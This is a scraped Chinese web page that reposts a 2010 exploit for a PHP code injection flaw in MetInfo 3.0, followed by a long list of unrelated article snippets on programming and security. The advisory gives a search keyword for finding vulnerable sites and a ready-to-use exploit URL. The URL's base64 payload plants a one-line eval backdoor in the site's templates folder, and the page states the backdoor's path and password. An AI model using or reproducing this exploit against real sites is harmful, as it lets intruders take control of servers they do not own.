kendyhj9999
kendyhj9999

MetInfo 3.0 PHP代码注入漏洞(getshell)

MetInfo 3.0 PHP代码注入漏洞(getshell)

来源:本站转载  作者:佚名  时间:2010-11-07  TAG:  我要投稿

官网:http://www.metinfo.cn/
关键字:"Powered by MetInfo 3.0 " 

来源:http://www.myhack58.com/Article/html/3/62/2010/28291.htm
描述:
在文件/include/common.inc.php第67行:
eval(base64_decode($allclass[0]));
$allclass[0] 变量未初始化 ,因此我们可以控制其值,进行代码注入的利用。

POC:http://target.com/include/common.inc.php?allclass[0]=[base64_encode(eval php code)]


Exploit:
http://target.com/include/common.inc.php?allclass[0]=ZnB1dHMoZm9wZW4oJy4uL3RlbXBsYXRlcy90ZXN0LnBocCcsJ3crJyksJzw/cGhwIGV2YWwoJF9QT1NUW2NdKTs/PicpOw==


base64编码部分内容为fputs(fopen('../templates/test.php','w+'),'');

一句话后门地址:http://target.com/templates/test.php 密码:c


另一篇文章:http://www.zysafe.com/html/holes/03/2012110838257.html

你可能感兴趣的:(PHP安全)

  • 【网络安全面经】渗透面经、安服面经、红队面经、hw面经应有尽有 这一篇真的够了 webfker from 0 to 1 githubgitjava
    目录面经牛客奇安信面经(五星推荐)牛客面经(推荐)渗透测试面经(推荐)渗透测试技巧计网面经SQL注入漏洞注入绕过XXE漏洞最强面经Github面经模拟面WEB安全PHP安全网络安全密码学一、青藤二、360三、漏洞盒子四、未知厂商五、长亭-红队六、qax七、天融信八、安恒九、长亭十、国誉网安十一、360-红队十二、天融信十三、长亭-2十四、360-2十五、极盾科技十六、阿里十七、长亭3十八、qax-
  • PHP面试题之三 (PHP高级部分)2021-09-15 一位先生_
    一、PHP核心技术1.写出一个能创建多级目录的PHP函数(新浪网技术部)2.写出smarty模板的特点(新浪网技术部)速度快,编译型,缓存技术,插件机制,强大的表现逻辑3.打开php.ini中的safe_mode,会影响哪些函数?至少说出6个。(新浪)safe_mode,php安全模式,它提供一个基本安全的共享环境,在一个有多个用户账户存在的php开发的web服务器上。当安全模式打开的时候,一些函
  • PHP安全的urldecode函数,只解码一次 用户昵称不能为空 urldecodephp
    需求旧项目用urlencodeurldecode来加密解密内容,但稍不留意,就存在多次解密。函数/***@param$str*@returnstring*/functionsafeUrlDecode($str){if(preg_match('~%[0-9A-F]{2}~i',$str)){returnurldecode($str);}return$str;}
  • 《白帽子讲web安全》 测试开发-东方不败之鸭梨 web安全安全
    第十四章PHP安全文件包含漏洞是“代码注入”的一种。“代码注入”这种攻击,其原理就是注入一段用户能控制的脚本或代码,并让服务器端执行。“代码注入”的典型代表就是文件包含(FileInclusion)。文件包含可能会出现在JSP、PHP、ASP等语言中常见的导致文件包含的函数如下。PHP:include(),include_once(),require(),require_once(),fopen(
  • PHP安全问题:远程溢出、DoS、safe_mode绕过漏洞 进击的雷神 安全测试PHP安全配置
    一、Web服务器安全PHP其实不过是Web服务器的一个模块功能,所以首先要保证Web服务器的安全。当然Web服务器要安全又必须是先保证系统安全,这样就扯远了,无穷无尽。PHP可以和各种Web服务器结合,这里也只讨论Apache。非常建议以chroot方式安装启动Apache,这样即使Apache和PHP及其脚本出现漏洞,受影响的也只有这个禁锢的系统,不会危害实际系统。但是使用chroot的Apac
  • PHP安全之道学习笔记 李维山 PHP进阶技术实战PHPPHP系统安全web安全安全架构
    不仅在php项目中,在所有网络应用的开发过程中,都会面临着各种各样的安全问题,有些可能是应用软件自身所暴露的安全隐患,也有些是开发人员自身编程原因导致的程序漏洞,这些无疑会对应用的安全性和稳定性造成不良的影响,作为开发人员,应该具备一定的安全防范知识,在开发过程中不断完善安全机制,加固应用程序的运行环境。下面为php开发中的一些安全防范手段,开发语言不尽相同,但有一些思想同样适用。1、屏蔽PHP错
  • php get 安全,php安全 - PHP如何安全地使用$_GET 珠仪 phpget安全
    本人新手,在《PHP安全编码》中提到“不要直接使用$_GET”,同时又提到“可以尝试在php.ini中开启magic_quotes_gpc,这样对于所有由用户GET、POST、COOKIE中传入的特殊字符都会转义”,我很纠结,是否开启magic_quotes_gpc就可以直接使用$_GET?如下面例子中的代码本人感觉很不安全,因为没有做验证,但又不知道如何改进,希望大神能帮忙,谢谢。回复内容:本人
  • php面试题-2021-php安全篇 峽谷一哥 php面试
    CDN劫持cdn是什么CDN又叫内容分发网络,主要是提高网站的速度,可以优化网站的访问速度,提高网站的安全性和稳定性。CDN能加速大家都知道,其实,CDN本身就是一种DNS劫持,只不过是良性的。不同于黑客强制DNS把域名解析到自己的钓鱼IP上。CDN是让DNS主动配合,把域名解析到临近的服务器上,同时服务器开启了HTTP代理,让用户感觉不到CDN的存在。不过CDN劫持不像黑客那样贪心,劫持用户所有
  • 金九银十,网络安全面试题汇总(2023年秋招最新) 网安知晓 web安全安全网络安全网络
    以下为信息安全各个方向涉及的面试题,星数越多代表问题出现的几率越大,没有填答案是希望大家如果不懂能自己动手找到答案,祝各位都能找到满意的工作~注:做这个List的目标不是很全,因为无论如何都不可能覆盖所有的面试问题,更多的还是希望由点达面,查漏补缺。TODOLIST渗透测试Web安全PHP安全Java安全Linux相关Windows相关内网渗透安全研发甲方安全运营渗透测试如何绕过CDN找到真实IP
  • php时间选择器插件与安全过滤参数发生空格冲突 漏刻有时 AIGCphp开发语言
    php参数过滤时,将“”作为隐患予以禁止,但是在时间传递时,如2023-09-3010:00:00作为变量传递时,被禁止。php安全参数过滤functionsafe_replace($str){$disallow_str=array('%27','%2527','*','"',"'",';','',"{",'}','\\','','and','script');if(is_array($str))
  • 谈谈 Web 安全 代码技巧
    攻击者无时无刻不在准备对你的Web应用程序进行攻击,因此提高你的Web应用程序的安全性是非常有必要的。幸运的是,来自开放式Web应用程序安全项目(OWASP)的有心人已经整理了一份包含了已知安全问题和防御方式的全面的清单。这份清单对于具有安全意识的开发者来说是必读的。由PadraicBrady著作的生存手册:PHP安全也是一份很不错的PHP安全阅读资料。阅读OWASP安全指南密码哈希每个人在建构P
  • 系统管理员必须知道的PHP安全实践 weixin_30240349 php操作系统数据库
    系统管理员必须知道的PHP安全实践PHP是一种开源服务器端脚本语言,应用很广泛。Apacheweb服务器提供了这种便利:通过HTTP或HTTPS协议,访问文件和内容。配置不当的服务器端脚本语言会带来各种各样的问题。所以,使用PHP时要小心。以下是25个PHP安全方面的最佳实践,可供系统管理员们安全地配置PHP。为PHP安全提示而提供的示例环境•文件根目录(DocumentRoot):/var/ww
  • 26项PHP安全实践 luyaran php(2)
    PHP是一种开源服务器端脚本语言,应用很广泛。Apacheweb服务器提供了这种便利:通过HTTP或HTTPS协议,访问文件和内容。配置不当的服务器端脚本语言会带来各种各样的问题。所以,使用php时要小心。以下是25个PHP安全方面的最佳实践。为PHP安全提示而提供的示例环境文件根目录(DocumentRoot):/var/www/html默认的Web服务器:Apache(可以使用Lighttpd
  • 架构师必须知道的26项PHP安全实践 fanghua_vip PHP
    PHP是一种开源服务器端脚本语言,应用很广泛。Apacheweb服务器提供了这种便利:通过HTTP或HTTPS协议,访问文件和内容。配置不当的服务器端脚本语言会带来各种各样的问题。所以,使用php时要小心。以下是25个PHP安全方面的最佳实践。为PHP安全提示而提供的示例环境文件根目录(DocumentRoot):/var/www/html默认的Web服务器:Apache(可以使用Lighttpd
  • 渗透测试面试题汇 网络安全小肖 数据库服务器运维web安全安全
    以下为信息安全各个方向涉及的面试题,星数越多代表问题出现的几率越大,没有填答案是希望大家如果不懂能自己动手找到答案,祝各位都能找到满意的工作:)注:做这个List的目标不是全,因为无论如何都不可能覆盖所有的面试问题,更多的还是希望由点达面,查漏补缺。TODOLIST渗透测试Web安全PHP安全Java安全Linux相关Windows相关内网渗透安全研发甲方安全运营渗透测试如何绕过CDN找到真实IP
  • PHP实现RSA加密解密 JSON_L PHPRSAphpseclibphp非对称加密
    目录安装phpseclib代码编写1.依赖引用2.创建密钥3.公钥加密4.私钥解密总结安装phpseclibPHP安全通信库phpseclib,可以使用它来操作OpenSSL、GMP、libnaid或mcrypt,当前主要进行加密解密应用。使用composer安装及处理依赖,命令:composerrequirephpseclib/phpseclib代码编写1.依赖引用require__DIR__.
  • 2019 PHP安全指南 夏天_很热
    2019年,大多数的科技工作者—尤其是Web开发者—必须摈弃掉关于开发安全PHP应用的老一套。这对那些不相信能够开发出安全的PHP应用的人来说尤其重要.image这篇指南应该作为PHP:TheRightWay这本电子书强调安全部分的补充,而不是作为代码风格一样的普通主题.PHP版本长话短说::除非你没有办法,2018年你在最好使用PHP7.2,同时在2019年早些时候计划切换到7.3。PHP7.2
  • 2019-11-08——PHP安全之变量覆盖 L1E6N0A2
    变量覆盖指的是用我们自定义的参数值替换程序原有的变量值,一般变量覆盖漏洞需要结合程序的其它功能来实现完整的攻击。经常导致变量覆盖漏洞场景有:$$,extract()函数,parse_str()函数,import_request_variables()使用不当,开启了全局变量注册等。全局变量覆盖register_globals的意思就是注册为全局变量,所以当On的时候,传递过来的值会被直接的注册为全
  • 2021-08-16(发暗月的计划) 杨某人要学习
    第一天HTML基础学习5课第二天div+css学习11课WEB安全03javascript基础WEB安全04htmldivcss博客项目WEB安全05php基础第三天数据库学习七课WEB安全07php安全开发博客系统第四天基础知识6课第五天信息收集6课第六天穷举篇13课第七天文件上传漏洞11课第八天SQL注入篇24课(要看2020的)WEB安全14XSS篇WEB安全15常见WEB漏洞篇第九天漏洞学
  • CIS 2021网络安全创新大会《代码安全体系建设》实录 汤青松daxia
    一、背景汤青松,北京趣加科技有限公司安全工程师,实体书《PHPWEB安全开发实战》作者,擅长企业安全建设,SDL安全建设。PHPCon2020第八届PHP开发者大会分享《PHP安全编码规范与审查》,NSC2019第七届中国网络安全大会分享《PHP反序列化漏洞分析实践》看雪2018安全开发者峰会担任Web安全训练营讲师大家好,非常高兴给大家分享《代码安全体系建设》议题,我是汤青松,目前在SDL方面做
  • 2023网络安全常见面试题汇总(附答案解析+配套资料) 小V讲安全 web安全安全网络安全网络学习
    以下为网络安全各个方向涉及的面试题,星数越多代表问题出现的几率越大,祝各位都能找到满意的工作。注:所有的资料都整理成了PDF,面试题和答案将会持续更新,因为无论如何也不可能覆盖所有的面试题。目录一、渗透测试二、Web安全相关三、PHP安全四、JAVA安全五、安全研发相关六、Linux相关七、内网渗透八、其他安全相关一、渗透测试如何绕过CDN找到真实IP,请列举五种方法(★★★)redis未授权访问
  • 2022最新网络安全岗面试题汇总(附答案解析) 我不是hack 网络安全web安全java面试系统安全
    以下为网络安全各个方向涉及的面试题,星数越多代表问题出现的几率越大,祝各位都能找到满意的工作。注:本套面试题,已整理成pdf文档,但内容还在持续更新中,因为无论如何都不可能覆盖所有的面试问题,更多的还是希望由点达面,查漏补缺。目录一、渗透测试二、Web安全相关三、PHP安全四、JAVA安全五、安全研发相关六、Linux相关七、内网渗透八、其他安全相关一、渗透测试如何绕过CDN找到真实IP,请列举五
  • 260道网络安全常见面试题汇总(附答案解析+配套资料) 小V知识分享 web安全安全网络网络安全
    以下为网络安全各个方向涉及的面试题,星数越多代表问题出现的几率越大,祝各位都能找到满意的工作。注:所有的资料都整理成了PDF,面试题和答案将会持续更新,因为无论如何也不可能覆盖所有的面试题。目录一、渗透测试二、Web安全相关三、PHP安全四、JAVA安全五、安全研发相关六、Linux相关七、内网渗透八、其他安全相关一、渗透测试如何绕过CDN找到真实IP,请列举五种方法(★★★)redis未授权访问
  • php7 mysql 卡顿_不要在PHP7中踩这些坑 Hasaki酱 php7mysql卡顿
    1.不要使用mysql_类函数终于,你不用再看到建议不要使用mysql_函数的提示了。因为PHP7从核心上完全移除了它们,这意味着请你移步至更好的mysqli_类函数,或者更灵活的PDO层。可以看看我们这篇文章PHP安全之使用PDO防SQL注入2.不要写无用的代码这看上去是个无脑建议,但是随着PHP7速度的提升掩盖了一些问题使它显得日趋重要。不要仅仅因切到PHP7让网站速度变得快点,你就沾沾自喜了
  • 2021-PHP核心技术经典面试题 浅糖不是糖 PHPPHP基础PHP面试php面试后端
    1.写出一个能创建多级目录的PHP函数2.写出smarty模板的特点速度快,编译型,缓存技术,插件机制,强大的表现逻辑3.打开php.ini中的safe_mode,会影响哪些函数?至少说出6个。safe_mode,PHP安全模式,它提供一个基本安全的共享环境,在一个有多个用户账户存在的php开发的web服务器上。当安全模式打开的时候,一些函数将被完全的禁止,而另一些函数的功能将会受到限制,如:ch
  • 【转载】PHP安全、Sql防注入安全汇总 guanguans
    利用Mysqli和PDO产生原因主要就是一些数据没有经过严格的验证,然后直接拼接SQL去查询。导致漏洞产生,比如:$id=$_GET['id'];$sql="SELECTnameFROMusersWHEREid=$id";因为没有对$_GET['id']做数据类型验证,注入者可提交任何类型的数据,比如"and1=1or"等不安全的数据。如果按照下面方式写,就安全一些。$id=intval($_GE
  • 白帽子讲Web安全(重点摘录) sports-boy 读书笔记安全webnetjava安全漏洞
    书名:白帽子讲Web安全作者:吴翰清出版社:电子工业出版社阅读进度:完结重点摘录:第1章我的安全世界观第2章浏览器安全第3章跨站脚本攻击(XSS)第4章跨站点请求伪造(CSRF)第5章点击劫持(ClickJacking)第6章HTML5安全第7章注入攻击第8章文件上传漏洞第9章认证与会话管理第10章访问控制第11章加密算法与随机数第12章Web框架安全第13章应用层拒绝服务攻击第14章PHP安全第
  • php防止源代码,PHP安全编程:防止源代码的暴露 臧竹萌11113123123 php防止源代码
    关于包含的一个重要问题是源代码的暴露。产生这个问题主要原因是下面的常见情况:对包含文件使用.inc的扩展名包含文件保存在网站主目录下Apache未设定.inc文件的类型Apache的默认文件类型是text/plain上面情况造成了可以通过URL直接访问包含文件。更糟的是,它们会被作为普通文本处理而不会被PHP所解析,这样你的源代码就会显示在用户的浏览器上。避免这种情况很容易。只能重组你的应用,把所
  • 常用php类库、资源 逸之云 php
    学习资源PHP相关的有参考价值的社区,博客,网站,文章,书籍,视频等资源PHP网站(PHPWebsites)PHPTheRightWay-一个PHP实践的快速参考指导PHPBestPractices-一个PHP最佳实践CleanCodePHP-一个PHP编码标准PHPWeeklyNews-一个PHP周刊SecuringPHP-有关PHP安全相关PHPFIG-PHP框架交互小组PSR中文翻译PHPS
  • 如何保护Wp-Config.Php文件 wordpress
    WordPressCMS内容管理系统的wp-config.php文件包含有关您的WordPress安装的非常敏感的信息,例如WordPress安全密钥和WordPress数据库连接详细信息,当然不希望此文件的内容落入坏人之手,因此WordPresswp-config.php安全绝对是您应该认真对待的事情。WordPress有很多方法可以从它面临的许多安全漏洞中强化自己。在本文中,我们晓得博客将主要
  • mondb入手 木zi_鸣 mongodb
    windows 启动mongodb  编写bat文件, mongod --dbpath D:\software\MongoDBDATA mongod --help  查询各种配置 配置在mongob 打开批处理,即可启动,27017原生端口,shell操作监控端口  扩展28017,web端操作端口 启动配置文件配置, 数据更灵活 
  • 大型高并发高负载网站的系统架构 bijian1013 高并发负载均衡
            扩展Web应用程序 一.概念         简单的来说,如果一个系统可扩展,那么你可以通过扩展来提供系统的性能。这代表着系统能够容纳更高的负载、更大的数据集,并且系统是可维护的。扩展和语言、某项具体的技术都是无关的。扩展可以分为两种:         1.
  • DISPLAY变量和xhost(原创) czmmiao display
    DISPLAY 在Linux/Unix类操作系统上, DISPLAY用来设置将图形显示到何处. 直接登陆图形界面或者登陆命令行界面后使用startx启动图形, DISPLAY环境变量将自动设置为:0:0, 此时可以打开终端, 输出图形程序的名称(比如xclock)来启动程序, 图形将显示在本地窗口上, 在终端上输入printenv查看当前环境变量, 输出结果中有如下内容:DISPLAY=:0.0
  • 获取B/S客户端IP 周凡杨 java编程jspWeb浏览器
       最近想写个B/S架构的聊天系统,因为以前做过C/S架构的QQ聊天系统,所以对于Socket通信编程只是一个巩固。对于C/S架构的聊天系统,由于存在客户端Java应用,所以直接在代码中获取客户端的IP,应用的方法为:    String ip = InetAddress.getLocalHost().getHostAddress(); 然而对于WEB
  • 浅谈类和对象 朱辉辉33 编程
        类是对一类事物的总称,对象是描述一个物体的特征,类是对象的抽象。简单来说,类是抽象的,不占用内存,对象是具体的, 占用存储空间。     类是由属性和方法构成的,基本格式是public  class 类名{ //定义属性 private/public 数据类型 属性名; //定义方法 publ
  • android activity与viewpager+fragment的生命周期问题 肆无忌惮_ viewpager
    有一个Activity里面是ViewPager,ViewPager里面放了两个Fragment。 第一次进入这个Activity。开启了服务,并在onResume方法中绑定服务后,对Service进行了一定的初始化,其中调用了Fragment中的一个属性。 super.onResume(); bindService(intent, conn, BIND_AUTO_CREATE);
  • base64Encode对图片进行编码 843977358 base64图片encoder
    /** * 对图片进行base64encoder编码 * * @author mrZhang * @param path * @return */ public static String encodeImage(String path) { BASE64Encoder encoder = null; byte[] b = null; I
  • Request Header简介 aigo servlet
    当一个客户端(通常是浏览器)向Web服务器发送一个请求是,它要发送一个请求的命令行,一般是GET或POST命令,当发送POST命令时,它还必须向服务器发送一个叫“Content-Length”的请求头(Request   Header)   用以指明请求数据的长度,除了Content-Length之外,它还可以向服务器发送其它一些Headers,如:    
  • HttpClient4.3 创建SSL协议的HttpClient对象 alleni123 httpclient爬虫ssl
    public class HttpClientUtils { public static CloseableHttpClient createSSLClientDefault(CookieStore cookies){ SSLContext sslContext=null; try { sslContext=new SSLContextBuilder().l
  • java取反 -右移-左移-无符号右移的探讨 百合不是茶 位运算符 位移
    取反: 在二进制中第一位,1表示符数,0表示正数 byte a = -1; 原码:10000001 反码:11111110 补码:11111111 //异或: 00000000 byte b = -2; 原码:10000010 反码:11111101 补码:11111110 //异或: 00000001
  • java多线程join的作用与用法 bijian1013 java多线程
            对于JAVA的join,JDK 是这样说的:join public final void join (long millis )throws InterruptedException Waits at most millis milliseconds for this thread to die. A timeout of 0 means t
  • Java发送http请求(get 与post方法请求) bijian1013 javaspring
    PostRequest.java package com.bijian.study; import java.io.BufferedReader; import java.io.DataOutputStream; import java.io.IOException; import java.io.InputStreamReader; import java.net.HttpURL
  • 【Struts2二】struts.xml中package下的action配置项默认值 bit1129 struts.xml
    在第一部份,定义了struts.xml文件,如下所示:   <!DOCTYPE struts PUBLIC "-//Apache Software Foundation//DTD Struts Configuration 2.3//EN" "http://struts.apache.org/dtds/struts
  • 【Kafka十三】Kafka Simple Consumer bit1129 simple
    代码中关于Host和Port是割裂开的,这会导致单机环境下的伪分布式Kafka集群环境下,这个例子没法运行。 实际情况是需要将host和port绑定到一起,   package kafka.examples.lowlevel; import kafka.api.FetchRequest; import kafka.api.FetchRequestBuilder; impo
  • nodejs学习api ronin47 nodejs api
    NodeJS基础 什么是NodeJS JS是脚本语言,脚本语言都需要一个解析器才能运行。对于写在HTML页面里的JS,浏览器充当了解析器的角色。而对于需要独立运行的JS,NodeJS就是一个解析器。 每一种解析器都是一个运行环境,不但允许JS定义各种数据结构,进行各种计算,还允许JS使用运行环境提供的内置对象和方法做一些事情。例如运行在浏览器中的JS的用途是操作DOM,浏览器就提供了docum
  • java-64.寻找第N个丑数 bylijinnan java
    public class UglyNumber { /** * 64.查找第N个丑数 具体思路可参考 [url] http://zhedahht.blog.163.com/blog/static/2541117420094245366965/[/url] * 题目:我们把只包含因子 2、3和5的数称作丑数(Ugly Number)。例如6、8都是丑数,但14
  • 二维数组(矩阵)对角线输出 bylijinnan 二维数组
    /** 二维数组 对角线输出 两个方向 例如对于数组: { 1, 2, 3, 4 }, { 5, 6, 7, 8 }, { 9, 10, 11, 12 }, { 13, 14, 15, 16 }, slash方向输出: 1 5 2 9 6 3 13 10 7 4 14 11 8 15 12 16 backslash输出: 4 3
  • [JWFD开源工作流设计]工作流跳跃模式开发关键点(今日更新) comsci 工作流
       既然是做开源软件的,我们的宗旨就是给大家分享设计和代码,那么现在我就用很简单扼要的语言来透露这个跳跃模式的设计原理    大家如果用过JWFD的ARC-自动运行控制器,或者看过代码,应该知道在ARC算法模块中有一个函数叫做SAN(),这个函数就是ARC的核心控制器,要实现跳跃模式,在SAN函数中一定要对LN链表数据结构进行操作,首先写一段代码,把
  • redis常见使用 cuityang redis常见使用
    redis 通常被认为是一个数据结构服务器,主要是因为其有着丰富的数据结构 strings、map、 list、sets、 sorted sets 引入jar包 jedis-2.1.0.jar  (本文下方提供下载) package redistest; import redis.clients.jedis.Jedis; public class Listtest
  • 配置多个redis dalan_123 redis
    配置多个redis客户端 <?xml version="1.0" encoding="UTF-8"?><beans xmlns="http://www.springframework.org/schema/beans"       xmlns:xsi=&quo
  • attrib命令 dcj3sjt126com attr
      attrib指令用于修改文件的属性.文件的常见属性有:只读.存档.隐藏和系统.    只读属性是指文件只可以做读的操作.不能对文件进行写的操作.就是文件的写保护.    存档属性是用来标记文件改动的.即在上一次备份后文件有所改动.一些备份软件在备份的时候会只去备份带有存档属性的文件. 
  • Yii使用公共函数 dcj3sjt126com yii
    在网站项目中,没必要把公用的函数写成一个工具类,有时候面向过程其实更方便。 在入口文件index.php里添加 require_once('protected/function.php'); 即可对其引用,成为公用的函数集合。 function.php如下:   <?php /**   * This is the shortcut to D
  • linux 系统资源的查看(free、uname、uptime、netstat) eksliang netstatlinux unamelinux uptimelinux free
    linux 系统资源的查看 转载请出自出处:http://eksliang.iteye.com/blog/2167081   http://eksliang.iteye.com 一、free查看内存的使用情况 语法如下:   free [-b][-k][-m][-g] [-t] 参数含义 -b:直接输入free时,显示的单位是kb我们可以使用b(bytes),m
  • JAVA的位操作符 greemranqq 位运算JAVA位移<<>>>
    最近几种进制,加上各种位操作符,发现都比较模糊,不能完全掌握,这里就再熟悉熟悉。   1.按位操作符 :    按位操作符是用来操作基本数据类型中的单个bit,即二进制位,会对两个参数执行布尔代数运算,获得结果。    与(&)运算:    1&1 = 1, 1&0 = 0, 0&0 &
  • Web前段学习网站 ihuning Web
      Web前段学习网站 菜鸟学习:http://www.w3cschool.cc/   JQuery中文网:http://www.jquerycn.cn/   内存溢出:http://outofmemory.cn/#csdn.blog   http://www.icoolxue.com/   http://www.jikexue
  • 强强联合:FluxBB 作者加盟 Flarum justjavac r
    原文:FluxBB Joins Forces With Flarum作者:Toby Zerner译文:强强联合:FluxBB 作者加盟 Flarum译者:justjavac FluxBB 是一个快速、轻量级论坛软件,它的开发者是一名德国的 PHP 天才 Franz Liedke。FluxBB 的下一个版本(2.0)将被完全重写,并已经开发了一段时间。FluxBB 看起来非常有前途的,
  • java统计在线人数(session存储信息的) macroli javaWeb
    这篇日志是我写的第三次了 前两次都发布失败!郁闷极了!   由于在web开发中常常用到这一部分所以在此记录一下,呵呵,就到备忘录了! 我对于登录信息时使用session存储的,所以我这里是通过实现HttpSessionAttributeListener这个接口完成的。 1、实现接口类,在web.xml文件中配置监听类,从而可以使该类完成其工作。 public class Ses
  • bootstrp carousel初体验 快速构建图片播放 qiaolevip 每天进步一点点学习永无止境bootstrap纵观千象
    img{ border: 1px solid white; box-shadow: 2px 2px 12px #333; _width: expression(this.width > 600 ? "600px" : this.width + "px"); _height: expression(this.width &
  • SparkSQL读取HBase数据,通过自定义外部数据源 superlxw1234 sparksparksqlsparksql读取hbasesparksql外部数据源
    关键字:SparkSQL读取HBase、SparkSQL自定义外部数据源     前面文章介绍了SparSQL通过Hive操作HBase表。   SparkSQL从1.2开始支持自定义外部数据源(External DataSource),这样就可以通过API接口来实现自己的外部数据源。这里基于Spark1.4.0,简单介绍SparkSQL自定义外部数据源,访
  • Spring Boot 1.3.0.M1发布 wiselyman spring boot
        Spring Boot 1.3.0.M1于6.12日发布,现在可以从Spring milestone repository下载。这个版本是基于Spring Framework 4.2.0.RC1,并在Spring Boot 1.2之上提供了大量的新特性improvements and new features。主要包含以下:   1.提供一个新的sprin
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他